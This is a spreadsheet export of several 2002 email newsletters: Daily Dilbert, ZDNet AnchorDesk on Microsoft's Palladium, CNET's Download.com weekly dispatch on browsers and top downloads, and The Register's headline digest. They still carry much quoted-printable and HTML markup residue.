    <t>--23561619.1026296118170.JavaMail.root.umsan1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit E-mail error You're subscribed to the HTML version of the Daily Dilbert, which shows the comic strip as a graphic, but your mail system either can't support HTML or is set up to remove HTML content. For more information, contact your Internet service provider or mail system administrator. To change to a plain text subscription, modify your account preferences at  [URL]http://www.dilbert.com[/URL] The plain text option appears toward the bottom of the modification page. --23561619.1026296118170.JavaMail.root.umsan1 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Daily Dilbert =09=09 =09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=0907/10/2002 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09&lt;= IMG SRC=3D"[URL]http://www.comics.com[/URL]" WIDTH= =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt; =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09Hi Justin, enjoy your daily comic from Dilbert.com.If you like the Daily Dil= bert, tell a friend! Click here to send mail= =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09= Complete your collection while pretending to work! &gt; Shop =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09They're character-shaped, in colle= ctible tins.&gt; Shop&lt;= /TD&gt; =09=09=09=09=09 =09=09=09=09=09Get any Dilbert strip publ= ished in the last 90 days printed on aT-shirt, sweatshirt or poster. Se= lected older strips are also available. &gt; Shop =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09View all pro= ducts =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09Buy This StripÂ Â Â Se= nd This Strip to a FriendÂ Â Â Month of Dilbert= Â Â  =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09Unsubscribe | = Modify Your Subscription | Request a New=  Subscription | Report S= ubscription Problems Subscribe to the Dilbert Newsletter/Join Dog= bert's New Ruling Class | Dilbert on Your Site/Intranet | Advertising Info | Dilbert in Your Publication =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09 =09=09 =09=09 =09=09=09 =09=09 =09=09=09 =09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09 =09 --23561619.1026296118170.JavaMail.root.umsan1--</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: AnchorDesk &lt;Online#3.19658.4b-VXMQgNtUP_hbAdRR.1@newsletter.online.com&gt;\nDate: Wed, 10 Jul 2002 06:14:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 06:14:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>AnchorDesk &lt;Online#3.19658.4b-VXMQgNtUP_hbAdRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>MS's Palladium: What the hell is it? (Here's what!) [ANCHORDESK]</t>
  </si>
  <si>
    <t>![](3D"[URL]http://www.zdnet.com[/URL] | ![3D"Advertisement"](3D"[URL]http://www.zdnet.com[/URL]")      =20 |  | ![](3D"[URL]http://www.zdnet.com[/URL]   =  |  ![](3D"[URL]http://www.zdnet.com[/URL]   =20 ![](3D"[URL]http://www.zdnet.com[/URL]   =20 =20 **= Veritas CEO Gary Bloom speaks out at Tech Update.**   =20 =20 **= Check out these personal laser printer picks at ZDNet Reviews.**   ![](3D"[URL]http://www.zdnet.com[/URL]")   =20 =20 **= See how WAP works and how you should use it at Builder.com.**&lt;= br&gt; ![](3D"[URL]http://www.zdnet.com[/URL]")   =20 =20 **= Need a new job? Find one today in ZDNet's Career Center.**   = ![](3D"[URL]http://www.zdnet.com[/URL]")   =20 =20 **= CIOs talk out about the future of IT at CNET News.com.**   &lt;= img src=3D"[URL]http://www.zdnet.com[/URL]" width=3D"1" height=3D"6= "&gt;      | ![](3D"[URL]http://www.zdnet.com[/URL]   =   ---|---|---   =20  ![3D=](3D"[URL]http://www.zdnet.com[/URL]   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") |  | ![3D""](3D"[URL]http://www.zdnet.com[/URL]   |  =20 ![](3D"[URL]http://www.zdnet.com[/URL]   WED JUL 10, 2002   = =20 ![](3D"[URL]http://www.zdnet.com[/URL]   =20  =20 =20  | ![3D"David](3D"[URL]http://www.zdnet.com[/URL]   ---   =20  **  David Coursey** | ![](3D"[URL]http://www.zdnet.com[/URL]   ---|---   ![](3D"[URL]http://www.zdnet.co[/URL]   ---   ![](3D"[URL]http://www.zdnet.com[/URL]   **MS's Palladium: What the hell i= s it? (Here's what!)**   ![](3D"[URL]http://www.zdnet.com[/URL]   Everybody's talking about Palladium, Microsoft's new "trust= worthy computing" architecture. But the details on what it is and how it wi= ll work are still extremely sketchy. Here's what I've been able to piece to= gether so far. =20 =20 **NOTE: Why we're changing our publishing schedule=**   ![](3D"[URL]http://www.zdnet.com[/URL]   =20 **PLUS: AnchorDesk Radio: Kicked out of Macworld   ![](3D"[URL]http://www.zdnet.com[/URL]   ![3D""](3D"[URL]http://www.zdnet.com[/URL]   | ![3D""](3D"http:=)   | ![3D""](3D"http:=)   |  ![3D""](3D"[URL]http://www.zdnet.com[/URL]   ![3D"More](3D"[URL]http://www.zdnet.com[/URL]   =20 WiFi nets: Stop sharing!... iPod for Linux... Super-sized n= otebooks =20 =20 =20 Why cyberterrorists don't care about your PC =20 =20 Guilty pleasures: 3 top politically incorrect games ![](3D"[URL]http://www.zdnet.com[/URL]   | ![3D""](3D"http:=)         =20 =20  **Crucial Clicks: More from ZDNet**   ---   &lt;= tr&gt; ![](3D"[URL]http://www.zdnet.co[/URL] | ![](3D"[URL]http://www.zdnet.com[/URL] | ![](3D"http://www=) = | ![](3D"[URL]http://www.zdnet.com[/URL] | ![](3D"[URL]http://www.zdnet.com[/URL]   | **PDAS**   ![](3D"http://www.=)   &lt;= /td&gt;   ---   | ![](3D"[URL]http://www.zdnet.com[/URL]") | **An industry fi= rst**   ZDNet reviewers take a look at Toshiba's e740, the first P= DA with Intel's new XScale processor and integrated WiFi connectivity.   ![](3D"http://ww=)   ![3D""](3D"[URL]http://techupdate.zdnet.com[/URL]")Read our Full Review   ![](3D"http://www.=) = |  | yMost Popular Products   ---   = ![3D""](3D"[URL]http://www.zdnet.com[/URL]") | ![3D""](3D"[URL]http://www.zdnet.com[/URL]   **Handhelds**   ![3D""](3D"[URL]http://www.zdnet.com[/URL]   **1**. To= shiba Pocket PC e310   ![3D""](3D"[URL]http://www.zdnet.com[/URL]&lt;= br /&gt; **2**. Toshiba Pocket = PC e740   ![3D""](3D"[URL]http://www.zdnet.com[/URL]   3**. Palm m515   ![3D""](=3D"[URL]http://www.zdnet.com[/URL]")   **4**. Palm Vx   ![3D""](3D"[URL]http://www.zdnet.com[/URL]   **5**. Compaq i= Paq H3835   ![3D""](3D"[URL]http://www.zdnet.com[/URL]   **More popular PDAs**   ![3D""](3D"[URL]http://www.zdnet.com[/URL]   | ![3D""](3D"[URL]http://www.zdnet.com[/URL]   ![](3D"[URL]http://www.zdnet.com[/URL]   ![](3D"[URL]http://www.zdnet.com[/URL]   =20 =20 =20 =20 =20 ![3D"News](3D"[URL]http://www.zdnet.co[/URL]   | **  SYLVIA CARR** | ![](3D"[URL]http://www.zdnet.com[/URL]   ---|---   ![](3D"[URL]http://www.zdnet.co[/URL]   ---   ![3D"SYLVIA](3D"[URL]http://www.zdnet.com[/URL]   |   | ![](3D"[URL]http://www.zdnet.com[/URL]   **WiFi= nets: Stop sharing!... iPod for Linux... Super-sized notebooks**   = Cable companies are demanding that customers stop sharing their high-speed = Net access over wireless networks. Plus: Linux users may soon be able to ac= cess Apple's iPod. And Toshiba unveils a fashionably large notebook.   ---|---|---   =20   ![3D=](3D"[URL]http://www.zdnet.com[/URL]   =20 =20 =20 =20  **  ROBERT VAMOSI** | ![](3D"[URL]http://www.zdnet.com[/URL]   ---|---   ![](3D"[URL]http://www.zdnet.co[/URL]   ---   ![3D"ROBERT](3D"[URL]http://www.zdnet.com[/URL]   |   | ![](3D"[URL]http://www.zdnet.com[/URL]   **Why cyberterrorists don't care about your PC** =   ![](3D"[URL]http://www.zdnet.com[/URL]")   Forget about viruses. America's real cybersecurity concerns= are the notoriously vulnerable computer systems that control our power and= water supplies. But Robert has a few ideas about how to keep the infrastru= cture safe.   ---|---|---      =20 =20 =20 =20  **  PRESTON GRALLA** | ![](3D"[URL]http://www.zdnet.com[/URL]   ---|---   ![](3D"[URL]http://www.zdnet.co[/URL]   ---   ![3D"PRESTON](3D"[URL]http://www.zdnet.com[/URL]   |   | ![](3D"[URL]http://www.zdnet.com[/URL]   **Guilty pleasures: 3 top politically incorrect ga= mes**   ![](3D"[URL]http://www.zdnet.com[/URL]   Sometimes you just want to kick back and drive drunk, commi= t a few crimes, or blast some innocent critters to smithereens. Preston's g= ot three raucous downloads that let you do all that and more--from the safe= ty of your PC.   ---|---|---      =20 * * * **AnchorDesk Home** | **Previous Issue** ![](3D"[URL]http://www.zdnet.com[/URL]")   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]")   | ![](3D"[URL]http://www.zdnet.com[/URL]")   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]")   | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]"=) | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]")   | ![](3D"[URL]http://www.zdnet.com[/URL]")   ---|---|---|---|---|---|---   ![](3D"[URL]http://www.zdnet.com[/URL] | ![](3D"[URL]http://www.zdnet.com[/URL] | ![](3D"[URL]http://www.zdnet.com[/URL]"=) | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"h=)   **Sign up for morefree newsletter= s from ZDNet**   ![](3D"[URL]http://www.zdnet.com[/URL]")   The e-mail address for your subscription is qqqqqqqqqq-zdnet@zzzason.or= g =20 Unsubscribe |=20  Manage=20 My Subscriptions | FAQ |=20  Advertise   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]"=) | ![](3D"[URL]http://www.zdnet.com[/URL] | ![](3D"[URL]http://www.zdnet.com[/URL]"=)   ---|---|---|---|---|---|---|---|---   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]"=) | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]")   ---|---|---|---|---|---|---   ![](3D"[URL]http://www.zdnet.com[/URL]") | ![](3D"[URL]http://www.zdnet.com[/URL]") | ![3D"ZDNet"](3D"[URL]http://www.zdnet.com[/URL] | Home |eBus= iness | Security | Networking | Applications = | Platforms | Hardware | Careers | ![](3D"[URL]http://www.zdnet.com[/URL]")   ---|---|---|---|---   ![](3D"[URL]http://www.zdnet.com[/URL]")   ---   |    **Copyright 2002 CNET Networks, Inc. All righ= ts reserved. ZDNet is a registered service mark of CNET Networks, Inc. &lt;= /font&gt;** | ![](3D"[URL]http://gserv.zdnet.com[/URL]      &lt;= tr&gt;  =      =20 ![](3D"[URL]http://clickthru.online.com[/URL]</t>
  </si>
  <si>
    <t>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 http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.co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 http://www.zdnet.com http://www.zdnet.co http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.co http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.co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qqqqqqqqqq-cnet-newsletters@example.com\nFrom: "CNET Download.com for PC" &lt;Online#3.19592.a8-JNyKlW9O8FdiLsRR.1@newsletter.online.com&gt;\nDate: Wed, 10 Jul 2002 04:17:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 04:17:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET Download.com for PC" &lt;Online#3.19592.a8-JNyKlW9O8FdiLsRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>This week: Browse or bust</t>
  </si>
  <si>
    <t>![Download Dispatch - PC Edition]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n|  ![Search Download.com]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nDownloads All CNET The Web  \n---  \n  \n![Updates &amp; Drivers]([URL]http://www.cnet.com[/URL]  \nIn Utilities:  \n**ESftp 4.1**\n\nIn Home &amp; Desktop:  \n**CursorXP 1.2**\n\nIn Audio:  \n**Acoustica CD Label Maker 1.13**\n\n**DJ 2000 1.6**\n\nIn Internet:  \n**ICQ 2002a Build #3728**\n\nIn Multimedia:  \n**AI Picture Utility 6.2.1**\n\n**PhotoJam 3.0**\n\nIn Web Authoring:  \n**Webserver Stress Tool 5.32**\n\nIn Games:  \n**David's Backgammon 4.6.1**\n\nWant to search for updates automatically? Click here to try out CNET CatchUp,\na free service that scans your system and points you to the latest software\nupdates.  \n  \n---  \n![Software\n\nUpgrades]([URL]http://a.r.tv.com[/URL]  \n\n| **Most Popular Upgrades:**  \n  \n---  \n**  1.** |  ZoneAlarm Pro 3.0  \n**  2.** |  Norton AntiVirus 2002  \n**  3.** |  AdSubtract Pro 2.5  \n**  4.** |  Microsoft Windows XP - Professional  \n**  5.** |  Nero Burning ROM 5.5  \n**  6.** |  Reason 2.0  \n**  7.** |  Microsoft Windows XP - Home Edition  \n**  8.** |  QuickBooks Pro 2002  \n**  9.** |  Adobe Photoshop 7.0  \n**10.** |  WinZip 8.1  \n  \nFind a complete list of the 50 most popular software products at **CNET\nShopper.com**.  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Summer 2002 software\n\nTest your bandwidth\n\nNew jobs, click here!\n\nInside HP\n\nBluetooth: speeds up **  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL] |  **July\n9, 2002**  \n![]([URL]http://www.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://download.cnet.com[/URL]\n\n**Browse or bust**  \nThrough daily use I've found that Mozilla and Opera Web browsers beat Internet\nExplorer because of two features: tabbed windows and built-in pop-up killers.\nBut occasionally I hit a site that has features that don't work or has a\nmessed up layout, so I have to launch IE to view it correctly. In the last\ncouple of years, Web builders have used proprietary code from Microsoft in\ntheir sites, which Mozilla and Opera don't support.\n\nI used to cover Web building, so I have plenty of insight into the problem.\nUsing current, standard HTML and JavaScript, Web builders can make a Web site\ndo almost anything that you could with Microsoft's proprietary code. The only\nthings they can't do are goofy enhancements such as changing the browser\nscroll bar colors. To solve this compatibility problem, either Web builders\nhave to take proprietary tags out of their sites or users have to use IE to\nview them. You can also enhance IE with utilities such as Secure IE to get the\nkinds of features offered by Mozilla and Opera, giving you the best of both\nworlds.\n\nWho do you think should be solving problems of Web site incompatibility: Web\nbuilders, users, or browser manufacturers? Let me know at edit@download.com.\n\nWayne Cunningham  \nFeatures Editor, CNET Download.com\n\n| ![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n| ![Reviews &amp; Features]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL]  \n---  \n** Is your ISP safe from hack attacks? **  \nSurely, the folks who run your ISP have thought long and hard about security\nissues, but should you count on them to ward off intruders? Not wise, says our\nISP expert. In this week's column, Dan Tynan takes security matters into his\nown hands and shows you how to protect yourself.  \n  \n  \n** Two apps that bring the iPod to the PC **  \nThat's right, Windows users. If you've been drooling over Apple's lovely\nlittle MP3 player, you're in luck. Not one but two software apps bring iPod\ncompatibility to your FireWire-equipped PC. EphPod and XPlay square off in\nthis battle of cross-platform compatibility.  \n  \n![CNET's Exclusive\nDownloads]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nNew products from our sponsors  \n![]([URL]http://www.cnet.com[/URL]  \n**Say the Time**  \nSay the Time is the newest evolution of the cuckoo clock. Hear the time, set\nmultiple alarms, customize the look of your taskbar clock, sync your PC with\nan atomic clock server, and more. Try it free.  \n  \n**Ashampoo WinOptimizer Suite **  \nFind redundant files, clean up your Registry, recover space on your hard\ndisks, and optimize Windows performance.  \n  \nAll Download Launchpad titles powered by Download Express--CNET's new speedy\ndownload service!  \n  \n![This Week's Top Ten Downloads]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nAs KaZaA continues to maintain its stranglehold on No.1, BearShare continues\nits climb up the list to No. 6 .  \n  \n|  **Most Popular Titles**  \nWeek ending July 9 |  **Last  \nWeek** |  **Weeks  \non Chart** |  **Downloads  \nThis Week**  \n---|---|---|---|---  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n1. |  **KaZaA Media Desktop** | 1 | 10 | 1,839,092  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n2. |  **Morpheus** | 2 | 62 | 742,235  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n3. |  **ICQ 2002a** | 3 | 250 | 445,174  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n4. |  **WinZip** | 4 | 299 | 362,230  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n5. |  **iMesh** | 5 | 115 | 305,699  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n6. |  **BearShare** | 7 | 73 | 214,030  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n7. |  **Ad-aware** | 6 | 43 | 140,849  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n8. |  **Download Accelerator** | 8 | 134 | 136,510  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n9. |  **Qtraxmax** | 18 | 3 | 134,426  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n10. |  **CNET CatchUp** | 12 | 114 | 82,420  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n  \n![This Week's Top Movers]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nHere are some of the fastest-rising downloads on our Most Popular list.  \n  \n| **Top Movers** | **The Rundown**  \n---|---|---  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n1. | **Nero Burning ROM** | This CD recording software is one of the top sellers at Shopper.com and clearly it's also popular at Downloads as it moves up 5 spots to No. 23.  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n2. | **DocCommander** | Enhancing the Open and Save pop-ups in Windows seems to be on users' wish lists as this utility moves up 7 spots to No. 29.   \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n3. | **SWiSH** | Adding Flash animations to your Web site is always a good eye-catcher, so it's no surprise that this app has started to rise, moving up 7 spots to No. 31.  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n4. | **Grand Theft Auto 2** | The latest update for this game spurs even more interest in an already wildly popular series, moving up 9 spots to No. 33.  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n5. | **IncrediMail Xe** | This customizable e-mailer continues to be popular with its personal look and makes a showing on the list at No. 40.  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n  \nWant more? See our **Top 50** downloads.\n\n![Picks of the Week]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**In Audio**  \n  \n**Quintessential Player 3.4**  \nLicense: Free  \nFile size: 2.48MB  \nMinimum requirements: Windows 95/98/Me/NT/2000/XP  \n  \nTailor your PC music experience with this skinnable audio player that offers a\nvast array of plug-ins. Use the basic player in the background while you work\non other apps, or perform a variety of operations from CD burning to playlist\norganizing or even processing with DSP effects.\n\nWant to review Quintessential Player? Submit your opinion here.\n\n**In Utilities**  \n  \n**RAM Idle Professional 2.0**  \nLicense: Free to try; $19.95 to buy  \nFile size: 1.18MB  \nMinimum requirements: Windows 95/98/Me/NT/2000/XP  \n  \nDoes your computer suffer from long lag times when you open programs or load\nWeb pages, choppy multimedia playback, crashes, or other symptoms of memory\nloss? Recover system memory and optimize your cache with this cure for\ncomputer amnesia.\n\nWant to review RAM Idle Professional? Submit your opinion here.\n\n**In Home &amp; Desktop**  \n  \n**Enterprise Theme 2.0**  \nFree  \nFile size: 1.71MB  \nMinimum requirements: Windows 98  \n  \n"Star Trek" fans have another reason to wear pointy ears and learn Klingon.\nThe latest iteration of the "Star Trek" franchise takes us back to the origins\nof Federation space exploration, in a time before Kirk or Picard. Now you can\nteleport your desktop there as well with this theme featuring sounds, icons,\nwallpapers, and more from the newest "Star Trek" show, "Enterprise."\n\nWant to review Enterprise Theme? Submit your opinion here.\n\n**In Games**  \n  \n**Magic: The Gathering Online 1.0**  \nFree  \nFile size: 309MB  \n  \nThe popular trading card game has gone online. Featuring hundreds of cards and\nan Internet full of opponents, plus tournaments and leagues, the action can\ncontinue indefinitely. And future expansion packs ensure that the level of\ngameplay stays fresh.\n\nWant to review Magic: The Gathering? Submit your opinion here.\n\n**In Web Authoring**  \n  \n**CoffeeCup HTML Editor 9.3**  \nFree to try; $49 to buy  \nFile size: 6.81MB  \nMinimum requirements: Windows 95/98/NT/2000/XP  \n  \nBrew up a Web site that will have your users asking for a second cup with this\nfull-featured, easy-to-use HTML editor. This program comes packed with\nprebuilt graphics, icons, photos, and JavaScript templates. You'll also find a\nframe designer, a table designer, a font designer, a built-in FTP client, and\nmultipage support. Version 9.3 includes additional JavaScript templates, a\nbuilt-in Flash text wizard, and right-click FTP functionality.\n\nWant to review CoffeeCup HTML Editor? Submit your opinion here.\n\n![Overheard on Download.com]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Last week I asked whether Audiogalaxy could survive only offering non-\ninfringing files. Here are a few of your answers:**\n\n_"Doomed. Completely, absolutely, utterly!"_\n\nJust about everyone agreed that Audiogalaxy is as dead as Napster.\n\n_"Each time a file-sharing service is canceled, a bunch of new ones appear."_\n\nBut some people always find a silver lining.\n\n_"I might use a file-sharing service for a lot of things, particularly\ndrivers, fixes, and patches."_\n\nA P2P network offering drivers seems like a great idea to me.\n\n_"I was an occasional Audiogalaxy participant (birthday CD burned to include\nsongs that were hits the year you were born). Now I'll just opt for a birthday\ncard and a bottle of wine."_\n\nI included this comment because I really like the birthday idea.\n\n_"It seems once again rather than release a file download site for music, at a\nfee per download, the music companies spend money on trying to stop download\nsites like Audiogalaxy."_\n\nWith its popularity, file swapping should be an amazing opportunity for record\ncompanies, but they must not be smart enough to figure out how to make it\nwork.  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![Sign up for more free newsletters from\n\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is\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15-01&amp;ISSUE=2002-07-10)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://cnet.com http://www.cnet.com http://a.r.tv.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://download.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.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Reg Subscribers &lt;update@list.theregister.co.uk&gt;\nFrom: update@list.theregister.co.uk\nDate: Wed, 10 Jul 2002 03:00:01 +0100</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 03:00:01 +0100</t>
  </si>
  <si>
    <t>Reg Headlines Wednesday July 10</t>
  </si>
  <si>
    <t>Today's Headlines from The Register\n-----------------------------------\n\n    To unsubscribe from this daily news update, see the instructions at\n    the end of this message.\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Software\n\n    EU report calls for widespread open source adoption\n    The only way for governments to share software and save money, it says\n        [URL]http://www.theregister.co.uk[/URL]\n\n    MS poised to announce .NET Server RC1?\n    The entrails look promising...\n        [URL]http://www.theregister.co.uk[/URL]\n\nEnterprise Systems\n\n    HP releases Itanium 2 benchmark data\n    Timp goes mad on benchmarks...\n        [URL]http://www.theregister.co.uk[/URL]\n\nSemiconductors\n\n    HP roadmaps Itanium futures as McKinley debuts\n    HP goes mad on mountain themes...\n        [URL]http://www.theregister.co.uk[/URL]\n\n    HP releases Itanium 2 benchmark data\n    Timp goes mad on benchmarks...\n        [URL]http://www.theregister.co.uk[/URL]\n\nInternet\n\n    BT Retail to flog 24/7 Net access\n    All Together now...\n        [URL]http://www.theregister.co.uk[/URL]\n\n    WorldCom takes the Fifth\n    They'll need it\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Web site censored over pictures of traffic wardens \n    Meter maids 'harassed, alarmed and distressed'\n        [URL]http://www.theregister.co.uk[/URL]\n\n    P45s for Porn Surfers \n    Net 'misuse' sackings on the rise\n        [URL]http://www.theregister.co.uk[/URL]\n\nBusiness\n\n    WorldCom takes the Fifth\n    They'll need it\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Sun shines on Scots job market\n    StarCat production transferred to Silicon Glen\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Buffet and friends sub Level 3 $500m for acquisitions\n    Chap 11 to predator in 60 seconds...\n        [URL]http://www.theregister.co.uk[/URL]\n\n    ROI faulty as measurement of IT success - survey\n    Sums don't always add up properly\n        [URL]http://www.theregister.co.uk[/URL]\n\nNetworks\n\n    Mitel cuts staff hours to pare payroll\n    10% less work, 10% less pay\n        [URL]http://www.theregister.co.uk[/URL]\n\nBroadband\n\n    Europe unhappy over local loops \n    Legal action looming\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Broadband users called to protest against BT\n    People power to take on 'crap service'\n        [URL]http://www.theregister.co.uk[/URL]\n\nThe Mac Channel\n\n    Celebrity Apple cronies silent on community expulsions\n    Pass the cake\n\n        [URL]http://www.theregister.co.uk[/URL]\n\nBOFH: Whole Shebang\n\n    The Bastard Vending Machine\n    Episode 15 Nasty Cola\n        [URL]http://www.theregister.co.uk[/URL]\n\nAbout The Register\n\n    Here Comes the Sun, da da da da\n    It-minds hot cup of Java beats the summertime blues\n        [URL]http://www.theregister.co.uk[/URL]\n\nBootnotes\n\n    Why Microsoft C# is 'paralysed or dead'\n    Letters The C Octothorpe Blues \n        [URL]http://www.theregister.co.uk[/URL]\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The Register and its contents are copyright 2002 Situation Publishing.\nAll rights reserved.\n\n    